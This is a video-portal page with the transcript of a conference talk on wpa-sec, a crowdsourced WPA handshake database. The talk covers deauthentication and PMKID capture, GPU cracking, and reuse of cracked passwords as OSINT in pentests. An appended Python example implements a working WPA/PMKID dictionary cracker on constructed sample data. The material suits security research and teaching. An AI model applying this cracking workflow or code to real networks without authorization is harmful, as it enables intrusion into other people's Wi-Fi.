PACKET HACKING VILLAGE - WPA-SEC: The largest online WPA handshake database

Video in TIB AV-Portal: PACKET HACKING VILLAGE - WPA-SEC: The largest online WPA handshake database

Formal Metadata

CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Content Metadata

Abstract

Started as a pet project in 2011, wpa-sec collects WPA handshake captures from all over the world. Contributors use a client script to download handshakes and specially crafted dictionaries to initiate attacks against the PSKs. With more than 115 GB of captures from 240 000 submissions, the collected samples represent an invaluable source for wireless security research. This includes:
- many improvements for emerging wireless security tools like the hcxtools suite;
- identified default PSK key generation algorithms used by various ISPs; those, along with fixes for current implementations, go into the RouterKeygen project;
- many more to come, based on current research activities;
- performance optimizations for WPA crackers;
- some identified Linux kernel driver bugs.
During the talk I will explain how wpa-sec works, provide statistics and a lot of internals on optimization, and show how to use the database as an OSINT source during pentests and red team actions.
Transcript

And so we are now ready for our third presentation of the day. Alex, from Bulgaria, correct? Oh, great, all right. So it is my pleasure to introduce to you Alex, who is going to be giving a talk on wpa-sec.

Thank you guys. So today I will talk about wpa-sec, which is currently the largest WPA handshake database. So what exactly is this? We are doing collection and processing of wireless network captures which are submitted by our users. Then we identify the handshakes in them. We maintain carefully crafted dictionaries to check them against, and there are contributors who contribute their GPU power to try to crack these handshakes and submit the results, which are available in real time.
wpa-sec works with several open source tools, and wpa-sec itself is also open source; you can see on the slide the live installation and the GitHub repository. So we are using hcxtools for handshake identification. hcxtools is a very interesting set of tools; it's pretty new, it has been developed for a year, maybe a bit more. The other one is the well-known RouterKeygen PC, which works for identifying known PSK generation algorithms. Of course the cracking is done by hashcat and John the Ripper, and we use WiGLE, thanks to the guys from there, for our AP geolocation.
So, some brief stats about the service. We now have more than half a million handshakes submitted. We have been doing this since 2011, so this is the whole set of handshakes; you see the RouterKeygen data, and our success rate is around 27%. Known algorithm generation hits around 5%, but I think we can do better, and from our crafted dictionaries it's around 10% of the cases that are cracked, because as you know this is a pretty greedy algorithm to crack. These are good results, but we are striving for more. The distribution based on WiGLE results: you can see there is no place where we don't have captures. A lot of people are submitting; our users are around 4000, so it's pretty interesting to see what users are using in different parts of the world.
So let's see what we're doing there. First we have to get the handshake; we all know how this happens. Back in time we were using the old AP attack: deauthenticate the active clients and get the handshake, right? This is very good because we can extract the AP's PSK and then we can do whatever with that AP. But as you also know, in crowded areas, or with bad connections, retransmissions, etc., in some places you have to apply nonce correction. Of course we can do better and attack the client directly, which is also nothing new, and there is no need for nonce correction since we control the network that the client connects to. Here we have to be very fast. And of course we can leverage some more interesting attacks at higher levels. The tool that we are suggesting to use for submissions to wpa-sec is hcxdumptool, which is part of hcxtools, and since last week it has a lot more interesting features. And of course, before submitting to the database, please don't clean or do anything with these captures, because you may destroy some valuable information that's in there.

The cracking part is also very well known; I don't think that I have to explain that, but basically it's PBKDF2 with SHA-1, and after that, depending on the version of WPA, we are using HMAC-MD5 or HMAC-SHA1, or CMAC. This is implemented in John the Ripper and hashcat, and of course it's implemented on the wpa-sec server side so we can do it better.
Nonce correction. We all know about nonce correction, and we very much care about it because we don't want to spend years of GPU power on something that can't be cracked in the end. We can also try to rely on the replay counter field, so we know exactly which nonce correction to use, but this is not a very good solution because often the APs keep the same replay counter field. From the database, around 5% of all these half a million handshakes that were cracked (because not everyone of this half million was cracked, only about 7%) needed nonce correction. The nonce correction can be negative or positive; you see the percentages; it can be implemented as little-endian or big-endian. Here you see the results: a lot of routers, Broadcom I believe, are affected, around 90% of those. Of course hcxtools can deal with this situation, so it can reduce this a lot.

So, the new kid on the block: the PMKID. I believe Martin wrote a forum post about it; the latest version of hashcat has these additional modes, and it was released just before the con. The idea here is that if you have a network with roaming enabled, following the 802.11i standard, we will have this PMKID, which is part of the RSN information element. Here you see how the PMKID value is calculated: we just need the MAC of the AP and the MAC of the station, which come from the association requests, reassociation requests and probe responses, and message 1 from the EAPOL exchange. So there is no need for all the hard-to-get parts of the handshake like before, and of course there is no need for nonce correction. If you get the PMKID you will be on the safe side with your cracking: if you have the password in the dictionary, you will get it.
The next part is the hardware we are using to collect that. Of course everybody builds his favourite rig. We are using Raspberry Pis like this one; what you see here is an e-paper display, which doesn't use any more power than we need, and with a pretty big battery you can run this for two or three days. The adapters we are using are anything that works with hcxtools; you can find the different types of adapters that we have tested and know are working. Here you see a Raspberry Pi based device with a hard antenna mod, which just runs off battery power; all this is very cheap. And here it's again a Raspberry Pi based solution, but with a way better antenna that gives us a lot more power, because you can use whatever you want for this.

So when you have the captures, the first thing that you have to do is to get a wpa-sec key. There is no strict registration process; we just issue a key and that's it. With this key you can access the results when they are cracked. On the server side, we process with hcxpcaptool, we check for duplicates, and a lot more, like trying to crack the PMKID. If we already have this network with this ESSID, there is no need for the whole thing to go to the crackers to exhaust their energy. Then we do the WiGLE geolocation, and of course if we don't have results from RouterKeygen PC, this goes to the crackers.
The guys that previously mined, I don't know, their favourite cryptocurrency can spend one of their GPUs. help_crack downloads the handshakes and dictionaries and feeds them to the cracker. It starts with all the new handshakes and the dictionaries with fewer words, and this gives some fair results for most people. What we are doing here, because we have so many handshakes, is that we combine them by ESSID: we fetch all networks that have one and the same ESSID, so we are doing the heavy PBKDF2 just once and attacking them all with our dictionaries. The other part is automatic dictionary combining, because if you have a very powerful GPU and one of these small dictionaries that we have, with a small word count, you're spending around 30 seconds to initialize the GPU and after that, for example, three or four seconds to push the full dictionary through. So we combine dictionaries automatically, depending on the number of GPUs we have and the GPU power.

When something is cracked, it gets submitted back, especially the PSK of the network and the BSSID. We do validation as far as we can, and in real time we generate the cracked dictionary; it's over there. So in real time you can get every password that has been cracked.

And there is a separate dictionary for the passwords that are coming from RouterKeygen. They are separated because most of the time they look like very random strings; of course they are not so random, that's why they end up in RouterKeygen, but they are not really interesting if you want to use this dictionary for your own assessments.
So what we've learned up to now: there are vendors and ISPs that are still using default BSSID- or ESSID-based algorithms. In the database there are the ones that we know, and we hope to get the others identified. This is connected to the work where people get the router firmware and try to find these default algorithms; with the wpa-sec results we are validating their results, and it gets pretty interesting. Of course, developing such a tool like hcxtools, we hit a lot of Linux kernel and driver bugs; we try to file as many bugs as possible, and most of them are already fixed, so this is a good thing for everyone that is using such hardware. We also identified some optimizations and improvements in hashcat and John the Ripper, which was also very good. And in the end, wpa-sec is very useful as an OSINT source, because for example you're doing a remote penetration test of some bank: you can go on WiGLE and see what networks are there, after that go to wpa-sec and see if somebody already captured some handshakes there. So from the start you already have something to work on, to try for password reuse, etc.

What's next with this project? It's been running for some years, but I'm sure that there are a lot more hidden algorithms, and we'll be very glad to check those out. The interesting thing about this default password stuff is that the information is spread over different forums, etc., very widely and not really useful when you look for something, and I think this will be a nice place to collect it all and to improve it. Of course the web interface: I really don't have a full screenshot because it's really awful; we have to do something better. Of course it would be nice to introduce an API for DB queries, so a lot of guys will have the possibility to dig into this database. But for now, if you have some ideas I'll be very happy to discuss; just drop me a mail and we'll work it out. And of course, prepare for WPA3. There are some speculations, I'm sure you'll think of something, but let's see the first client implementations and server ... so we'll see how this goes. It will be a first version, so I'm sure this will not go away. So thank you guys. [Applause]
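The arithmetic the talk walks through in the cracking, PMKID and help_crack sections (PBKDF2 from passphrase and ESSID to the PMK, the EAPOL MIC with HMAC-MD5 or HMAC-SHA1 depending on the key descriptor version, the PMKID from message 1, and grouping targets by ESSID so the expensive PBKDF2 runs once per candidate), as an added Python example that is not part of the talk, of hcxtools, hashcat or the wpa-sec code base. The MAC addresses, nonces, passphrases, wordlist and EAPOL-Key frame are constructed inside the example; the `Handshake`, `PmkidTarget` and `crack` names are this example's own; the AES-128-CMAC descriptor (version 3) is deliberately left out.

```python
import hashlib
import hmac
from dataclasses import dataclass

PMKID_LABEL = b"PMK Name"               # IEEE 802.11 label used in the PMKID derivation
PTK_LABEL = b"Pairwise key expansion"   # IEEE 802.11 PRF label used for the PTK
MIC_OFFSET = 81                         # offset of the Key MIC field in an EAPOL-Key frame
MIC_LEN = 16


def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA-PSK: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit PMK. This is the expensive step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): no nonces needed."""
    return hmac.new(pmk, PMKID_LABEL + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK = first 128 bits of the PTK. The 802.11 PRF is HMAC-SHA1(PMK, label || 0x00 || B || i)
    concatenated over i = 0, 1, ...; the KCK fits in the first block, so only i = 0 is computed."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return hmac.new(pmk, PTK_LABEL + b"\x00" + b + b"\x00", hashlib.sha1).digest()[:16]


def compute_mic(kck: bytes, eapol: bytes, descriptor_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. Key descriptor version 1 (WPA/TKIP)
    uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1; version 3 (AES-128-CMAC) is not handled here."""
    digest = {1: hashlib.md5, 2: hashlib.sha1}.get(descriptor_version)
    if digest is None:
        raise ValueError("key descriptor version %d not supported by this example" % descriptor_version)
    frame = bytearray(eapol)
    frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN] = bytes(MIC_LEN)
    return hmac.new(kck, bytes(frame), digest).digest()[:MIC_LEN]


def build_eapol_m2(snonce: bytes, replay_counter: int, descriptor_version: int,
                   mic: bytes = bytes(MIC_LEN)) -> bytes:
    """Constructed EAPOL-Key message 2: 802.1X header, RSN descriptor, Key Info with the
    Pairwise and MIC bits set, zero IV/RSC/ID and empty key data (layout puts the MIC at offset 81)."""
    key_info = (0x0108 | descriptor_version).to_bytes(2, "big")
    body = (b"\x02" + key_info + (16).to_bytes(2, "big") + replay_counter.to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + mic + (0).to_bytes(2, "big"))
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


@dataclass(frozen=True)
class Handshake:
    """Classic target: ANonce from message 1 plus the MIC'd message 2 (SNonce and EAPOL frame)."""
    essid: bytes
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes
    descriptor_version: int

    def check(self, pmk: bytes) -> bool:
        kck = derive_kck(pmk, self.ap_mac, self.sta_mac, self.anonce, self.snonce)
        return compute_mic(kck, self.eapol, self.descriptor_version) == self.eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]


@dataclass(frozen=True)
class PmkidTarget:
    """PMKID target: only the two MACs and the PMKID carried in message 1, so no nonce correction."""
    essid: bytes
    ap_mac: bytes
    sta_mac: bytes
    pmkid: bytes

    def check(self, pmk: bytes) -> bool:
        return compute_pmkid(pmk, self.ap_mac, self.sta_mac) == self.pmkid


def crack(targets, wordlist):
    """Dictionary attack grouped by ESSID: one PBKDF2 per (ESSID, candidate), then the cheap
    MIC/PMKID check against every pending target with that ESSID. Returns {target: passphrase}."""
    by_essid = {}
    for target in targets:
        by_essid.setdefault(target.essid, []).append(target)
    found = {}
    for essid, pending in by_essid.items():
        for word in wordlist:
            if not pending:
                break
            pmk = derive_pmk(word, essid)
            hits = [t for t in pending if t.check(pmk)]
            found.update((t, word) for t in hits)
            pending = [t for t in pending if t not in hits]
    return found


def make_sample_targets():
    """Constructed captures (not data from the wpa-sec database): one WPA2 handshake and one
    PMKID on the same ESSID, so the grouped attack derives each candidate PMK only once."""
    essid = b"MyWifi"
    ap1, sta1 = bytes.fromhex("0a1b2c3d4e5f"), bytes.fromhex("c0ffee123456")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = derive_kck(derive_pmk("password123", essid), ap1, sta1, anonce, snonce)
    mic = compute_mic(kck, build_eapol_m2(snonce, 1, 2), 2)
    handshake = Handshake(essid, ap1, sta1, anonce, snonce, build_eapol_m2(snonce, 1, 2, mic), 2)
    ap2, sta2 = bytes.fromhex("0a1b2c3d4e60"), bytes.fromhex("c0ffee654321")
    pmkid = PmkidTarget(essid, ap2, sta2, compute_pmkid(derive_pmk("letmein12", essid), ap2, sta2))
    return [handshake, pmkid]


if __name__ == "__main__":
    for target, word in crack(make_sample_targets(), ["12345678", "letmein12", "qwertyuiop", "password123"]).items():
        print(type(target).__name__, target.ap_mac.hex(":"), "->", word)
```

Both target types end in the same `check(pmk)` interface, which is what makes the ESSID grouping possible: the loop pays the 4096-round PBKDF2 once per candidate and then spends a single HMAC per target, so a large database of networks with a common ESSID costs little more than a single one.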